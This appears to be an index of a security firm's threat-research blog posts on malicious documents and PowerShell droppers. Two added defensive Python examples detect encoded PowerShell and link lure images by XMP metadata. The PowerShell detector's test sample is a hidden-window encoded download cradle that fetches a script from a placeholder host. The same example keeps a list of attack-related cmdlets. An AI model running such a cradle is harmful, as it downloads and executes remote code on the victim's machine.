With the holiday season upon us and Log4j-nia still keeping most of us awake at night, we want to revisit an old chum who continues to operate in full swing amidst the chaos.
How does fishing work in real life? The fisherman chooses a suitable spot, picks the right tools (a rod or nets), and chooses the right bait. When everything is ready, he can expect a fair degree of success.
We found a wave of phishing documents carrying an unusual lure. Digging into the tactics of this attack, we uncovered some unique TTPs, including a Stage 2 hosted on a Blogspot page flagged as adult content, which can only be viewed by a logged-in user whose account is at least a year old. Let's look at how the sample works.
A few days ago, we discovered a wave of phishing emails with an attached document. A considerable number of the samples had zero detections on VirusTotal, and several files stayed undetected by AV engines for some time, so we decided to focus on this wave and explore it in more detail.
Protecting an organization from today's cyber threats is not a simple task but an extensive one. The threat landscape is constantly changing and requires a flexible approach to defense; the threats, techniques, and vulnerabilities that cybercriminals exploit may be unknown even to the organizations that protect their users. This post is a prime example: the exploitation of a critical vulnerability by an exploit found in the wild.
Microsoft MSHTML Remote Code Execution Vulnerability. As we roll into autumn and the season changes, so does the threat landscape. The emergence of a new CVE signals another arms race, with attackers vying to leverage the exploit effectively and defenders working out how to mitigate its effects.
Mobile devices as an espionage tool.
Email-borne attacks frequently begin with a malicious document attachment. This long-running trend continues to pose a serious threat to the security of organizations and users. Criminals are constantly improving their methods and looking for new ways to compromise victims. Payload trends change over time, with ransomware currently capturing many of the headlines.
A few days ago, we found an interesting document in the wild that aims to download spyware applications. The sample shows low detection rates across multiple antivirus engines, which raised our suspicion. The email carrying the attachment purported to come from a logistics company.
We have found an intriguing document that hides a whole chain of PowerShell (PS) scripts. The original document uses a coercive lure to make the victim enable macros, which then drop malicious artifacts. This document's lure is written in French: "BIENVENUE DANS WORD Microsoft Word a ete mise a jour avec succes" ("WELCOME TO WORD Microsoft Word has been updated successfully").
What we all need now and again is some exciting news, and since we have some, we wanted to write a post to share it! Earlier this month, our friends at Abuse.ch officially announced in a tweet that their MalwareBazaar project has integrated with InQuest's Deep File Inspection (DFI) analysis stack.
At InQuest, we're fanatical about malware analysis and ingest real-world samples at-scale, dissecting millions of files daily. We leverage a combination of our Deep File Inspection (DFI™) analysis engine and a proprietary machine-learning apparatus to distill a daily volume of millions of samples down to a harvest consisting of dozens of "interesting" samples.
Throughout InQuest's research into detecting maldocs, due attention has been given to the graphical asset used as the coercive lure. From "Worm Charming", InQuest's Malware Lures Gallery, and Optical Character Recognition (OCR) of the instructive text that coaxes users into enabling embedded logic, countless wins have been brought to the community's attention. This quick blog details a couple of approaches for extracting maldoc images without opening the document and copying the image out.
The SOC-Class is a niche course on cybersecurity operations, training CISOs, SOC Managers, and technical leads to build and excel in Cybersecurity Operations Centers (SOCs/CSOCs). The use case development methodology described here is one of the approaches discussed in the course; it is intended to provide a framework for the mature and repeatable construction of engineered detections.
In this blog, we dissect a novel and stealthy Excel Macrosheet fueled malware campaign that currently bypasses most protection stacks to deliver ZLoader to its victims. We trace the earliest appearance to Monday, May 4th (Star Wars Day), and continue to actively track this evolving campaign.
In this quick end-of-week post, we wanted to touch on the ubiquitous COVID-19 (aka Coronavirus), sharing an interesting lure, related malware, and some IOCs for colleagues to dig into while society as a whole is confined to our homes. Our post is in no way comprehensive: there are myriad malware campaigns, disinformation operations, and general scams revolving around this very concerning topic. Our goal is to raise awareness and share some knowledge in the process.
In this post, we provide a detailed analysis of an interesting Excel 4.0 XLM macrosheet maldoc distribution campaign that is tied to a variety of executable payloads, a subject matter we'll be covering in a future blog. As of the time of writing, detection rates for this class of attack are relatively low, and these samples happily bypass the internal GSuite and O365 protection mechanisms.
InQuest combines Deep File Inspection (DFI) and RetroHunting™ to bring the threat hunting capabilities of VirusTotal Intelligence to your own environment. VirusTotal provides analysts with powerful tools to threat hunt against millions of files, domains, and IPs, but has the drawback of not currently offering a self-hosted option for organizations that wish to keep their data private.
In this blog, we discuss Adobe Extensible Metadata Platform (XMP) identifiers (IDs) and how they can be used as both pivot and detection anchors. Defined as a standard for mapping the relationships between graphical assets, XMP allows tracking of both parent-child relationships and individual revisions. There are three categories of identifiers: original document, document, and instance.
InQuest provides an automated platform for SOC hunters that includes powerful means for inspecting files to detect the presence of malicious code. The platform ingests network data and runs it through a variety of analytic functions, resulting in an effective risk score. Check out this interview between Ed Amoroso of Tag Cyber and Pedram Amini, our CTO.
In this short post, we share a YARA rule that threat hunters will find valuable for identifying potentially malicious PowerShell pivots; specifically, we look for base64-encoded PowerShell directives. We also share some interesting real-world samples with the reader, including an SSL certificate, a Microsoft Windows shortcut (LNK) file, and a JPG image.
In this article, we analyze a malicious HTA file found on VirusTotal. The sample uses a few interesting techniques to evade existing detection mechanisms; we provide an in-depth analysis and reveal the techniques it uses to stay under the radar. At the time we hunted it, only two engines marked the sample as malicious.
In this article, we dissect a sophisticated multi-stage PowerShell script found on Hybrid Analysis a few days back. The discussion covers the various techniques this particular malware instance uses to stay under the radar. As of this writing, none of the antivirus engines on VirusTotal detected the sample.
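The XMP teaser above names the three identifier categories, and the PowerShell teaser names the base64 pivot; the following added Python example (written for this page, not code from InQuest or from either post) shows the base64 half in working form. Because -EncodedCommand carries UTF-16LE text, a keyword can land at any of three byte alignments inside the Base64 stream, so a YARA-style match needs one fragment per alignment; the example derives those fragments, then scans a constructed command line (and the UTF-16LE form a LNK file would store) and decodes what it finds. The sample command, the keyword list and the URL are constructed for illustration.

```python
import base64
import re

# powershell.exe takes -EncodedCommand (documented short forms -e / -ec, and any
# unambiguous prefix such as -enc) followed by Base64 of the UTF-16LE command text.
_PREFIXES = ["e" + "ncodedcommand"[:i] for i in range(14)] + ["ec"]
ENC_RE = re.compile(
    rb"-(?:" + b"|".join(p.encode() for p in sorted(_PREFIXES, key=len, reverse=True))
    + rb")\s+([A-Za-z0-9+/]{16,}={0,2})",
    re.IGNORECASE,
)

# Cmdlets and members a hunter typically flags inside decoded PowerShell (illustrative list).
SUSPICIOUS = ("Invoke-Expression", "IEX", "DownloadString", "FromBase64String",
              "Net.WebClient", "Start-Process")


def b64_fragments(keyword: str) -> list[str]:
    """Return three Base64 substrings, one per byte alignment, that any Base64 encoding
    of UTF-16LE text containing `keyword` must contain. A YARA rule can match these
    fragments directly, which is how encoded content is caught without decoding it."""
    raw = keyword.encode("utf-16le")
    fragments = []
    for shift in range(3):
        padded = b"\x00" * shift + raw          # stand-in for the unknown preceding bytes
        enc = base64.b64encode(padded).decode().rstrip("=")
        lead = (0, 2, 3)[shift]                  # leading chars that mix in those unknown bytes
        tail = 1 if len(padded) % 3 else 0       # trailing char that mixes in unknown following bytes
        fragments.append(enc[lead:len(enc) - tail])
    return fragments


def encoded_contains(b64: bytes, keyword: str) -> bool:
    """True if the Base64 blob contains `keyword` (as UTF-16LE) at some alignment."""
    text = b64.decode("ascii", errors="ignore")
    return any(f in text for f in b64_fragments(keyword))


def decode_encoded_command(b64: bytes) -> str:
    """Decode an -EncodedCommand argument: restore missing '=' padding, then UTF-16LE."""
    b64 += b"=" * (-len(b64) % 4)
    return base64.b64decode(b64).decode("utf-16le", errors="replace")


def find_encoded_powershell(blob: bytes) -> list[dict]:
    """Scan a byte blob for encoded PowerShell invocations; report each decoded command
    and the suspicious keywords it contains."""
    # LNK arguments and many other Windows artifacts store the command line as UTF-16LE,
    # where an ASCII regex never fires, so scan a narrowed view of that encoding as well.
    views = [
        ("raw", blob),
        ("utf16", blob.decode("utf-16le", errors="ignore").encode("ascii", errors="ignore")),
    ]
    hits = []
    for view, data in views:
        for m in ENC_RE.finditer(data):
            decoded = decode_encoded_command(m.group(1))
            hits.append({
                "view": view,
                "offset": m.start(),
                "decoded": decoded,
                "keywords": [k for k in SUSPICIOUS if k.lower() in decoded.lower()],
            })
    return hits


# Constructed sample: a typical download cradle as it would appear in a dropper.
CMD = 'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/a.ps1")'
ENCODED_CMD = base64.b64encode(CMD.encode("utf-16le"))
SAMPLE = b"powershell.exe -NoP -w hidden -enc " + ENCODED_CMD
SAMPLE_UTF16 = SAMPLE.decode("ascii").encode("utf-16le")   # as stored in a LNK argument field

if __name__ == "__main__":
    print("Base64 fragments for DownloadString:", b64_fragments("DownloadString"))
    for hit in find_encoded_powershell(SAMPLE) + find_encoded_powershell(SAMPLE_UTF16):
        print(hit["view"], hit["offset"], hit["keywords"], hit["decoded"])
```

The fragments returned by `b64_fragments` are exactly what goes into a YARA `strings:` section (one `$s` per alignment, combined with `any of them`); the decode step is what a hunter runs afterwards to confirm the hit. Matching the `-e`/`-enc` switch itself is the noisy part: legitimate automation uses it too, so the decoded content, not the switch, should drive the verdict.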
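For the XMP identifiers teaser, here is an added Python example (not code from the post or from InQuest) that pulls the three xmpMM identifiers out of any file embedding an XMP packet and then uses them as a pivot: two files are related if they share an original-document or document ID, directly or through the parent named in xmpMM:DerivedFrom. The packet layout and the IDs below are constructed placeholders; the example assumes the standard `x:xmpmeta` wrapper and the usual `xmpMM`/`stRef` prefixes that Adobe tools emit.

```python
import re

# Identifier names in the xmpMM (XMP Media Management) namespace, in order of decreasing
# stability: OriginalDocumentID follows an asset through every derivative, DocumentID
# changes when it is saved as a new document, InstanceID changes on every save.
ID_NAMES = ("OriginalDocumentID", "DocumentID", "InstanceID")
_NAMES = "|".join(ID_NAMES).encode()
PACKET_RE = re.compile(rb"<x:xmpmeta\b.*?</x:xmpmeta>", re.DOTALL)
# Attribute form:  xmpMM:DocumentID="xmp.did:..."
ATTR_RE = re.compile(rb'(?:\w+:)?\b(' + _NAMES + rb')\s*=\s*"([^"]+)"')
# Element form:    <xmpMM:DocumentID>xmp.did:...</xmpMM:DocumentID>
ELEM_RE = re.compile(rb"<(?:\w+:)?(" + _NAMES + rb")\s*>([^<]+)</")
# xmpMM:DerivedFrom names the parent through stRef:documentID / stRef:instanceID.
DERIVED_RE = re.compile(rb"<(?:\w+:)?DerivedFrom\b([^>]*)>")
STREF_RE = re.compile(rb'\b(documentID|instanceID)\s*=\s*"([^"]+)"')


def extract_xmp_ids(data: bytes) -> dict:
    """Collect every xmpMM identifier (and DerivedFrom parent reference) from all XMP
    packets found in a byte blob, whatever container (JPEG, PDF, PNG ...) carries it."""
    ids = {name: [] for name in ID_NAMES}
    ids["DerivedFrom"] = []
    for packet in PACKET_RE.findall(data):
        for regex in (ATTR_RE, ELEM_RE):
            for name, value in regex.findall(packet):
                ids[name.decode()].append(value.decode().strip())
        for attrs in DERIVED_RE.findall(packet):
            ref = {k.decode(): v.decode() for k, v in STREF_RE.findall(attrs)}
            ids["DerivedFrom"].append((ref.get("documentID"), ref.get("instanceID")))
    return ids


def shares_lineage(a: dict, b: dict) -> bool:
    """Pivot check: the two files are related if any document-level ID of one appears in
    the other's lineage (its own IDs or the parent document it was derived from)."""
    def lineage(ids):
        docs = set(ids["OriginalDocumentID"]) | set(ids["DocumentID"])
        return docs | {doc for doc, _ in ids["DerivedFrom"] if doc}
    return bool(lineage(a) & lineage(b))


def xmp_packet(orig: str, doc: str, inst: str, parent=None) -> bytes:
    """Constructed XMP packet in the attribute/element mix Adobe tools emit."""
    derived = ""
    if parent:
        derived = (f'<xmpMM:DerivedFrom stRef:documentID="{parent[0]}" '
                   f'stRef:instanceID="{parent[1]}"/>')
    return (
        '<?xpacket begin="\ufeff" id="W5M0MpCehiHzreSzNTczkc9d"?>'
        '<x:xmpmeta xmlns:x="adobe:ns:meta/">'
        '<rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">'
        '<rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" '
        'xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" '
        f'xmpMM:OriginalDocumentID="{orig}" xmpMM:DocumentID="{doc}">'
        f"<xmpMM:InstanceID>{inst}</xmpMM:InstanceID>{derived}"
        '</rdf:Description></rdf:RDF></x:xmpmeta><?xpacket end="w"?>'
    ).encode("utf-8")


# Placeholder identifiers (real ones are 32 hex digits after the xmp.did:/xmp.iid: prefix).
ORIG_ID = "xmp.did:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
DOC_ID = "xmp.did:BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"
INST_ID = "xmp.iid:CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC"
CHILD_DOC_ID = "xmp.did:DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD"
CHILD_INST_ID = "xmp.iid:EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"

# Constructed "files": a few bytes of JPEG-like framing around the packet.
LURE_IMAGE = b"\xff\xd8\xff\xe1" + xmp_packet(ORIG_ID, DOC_ID, INST_ID) + b"\xff\xd9"
EDITED_IMAGE = (b"\xff\xd8\xff\xe1"
                + xmp_packet(ORIG_ID, CHILD_DOC_ID, CHILD_INST_ID, parent=(DOC_ID, INST_ID))
                + b"\xff\xd9")
UNRELATED = (b"\xff\xd8\xff\xe1"
             + xmp_packet("xmp.did:11111111111111111111111111111111",
                          "xmp.did:22222222222222222222222222222222",
                          "xmp.iid:33333333333333333333333333333333")
             + b"\xff\xd9")

if __name__ == "__main__":
    lure, edited = extract_xmp_ids(LURE_IMAGE), extract_xmp_ids(EDITED_IMAGE)
    print(lure)
    print("edited image derived from lure:", shares_lineage(lure, edited))
    print("unrelated image:", shares_lineage(lure, extract_xmp_ids(UNRELATED)))
```

For detection, the stable end of the scale is the useful one: an InstanceID only catches byte-identical re-uses of a lure image, while a DocumentID or OriginalDocumentID also catches re-saved and re-cropped derivatives, at the cost of occasional collisions with files that share an innocent template.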
In this article, we dissect a sneaky malicious Microsoft Excel XLM file that we caught in the wild. To do so, we utilize a few open source as well as in-house tools to analyze the Excel document. During our analysis, we point out the limitations of a few popular file carving tools, such as foremost and scalpel, in extracting data from this and related samples.
InQuest helps organizations with both threat hunting and incident response through our RetroHunt capability. RetroHunting allows searching historical data with signatures to see whether any of them match within that historical file set.
InQuest provides an on-premises network-focused security solution deployed at many high-volume, mission critical environments, including DISA's Joint Regional Security Stack (JRSS). JRSS comprises a regional network security architecture subset for the Joint Information Environment (JIE), administered by DISA.
In reviewing the results of our Microsoft Office DDE malware hunt, we came across an interesting lure posing as a Securities and Exchange Commission (SEC) Office of Management and Budget (OMB) approval letter. The sample uses some tricks to increase its chances of successful exploitation. We'll walk through the dissection of the components in this post.
On October 9th, 2017, SensePost researchers posted a technique demonstrating macro-less command execution in Microsoft Office documents through Dynamic Data Exchange (DDE). While variations of this technique are known, the post sheds light on the fact that Microsoft has no intent to address the matter and that "exploit" creation is trivial. This post provides an overview of the vulnerability and a mitigation, covers sample hunting, and dissects a few interesting samples gathered during the week.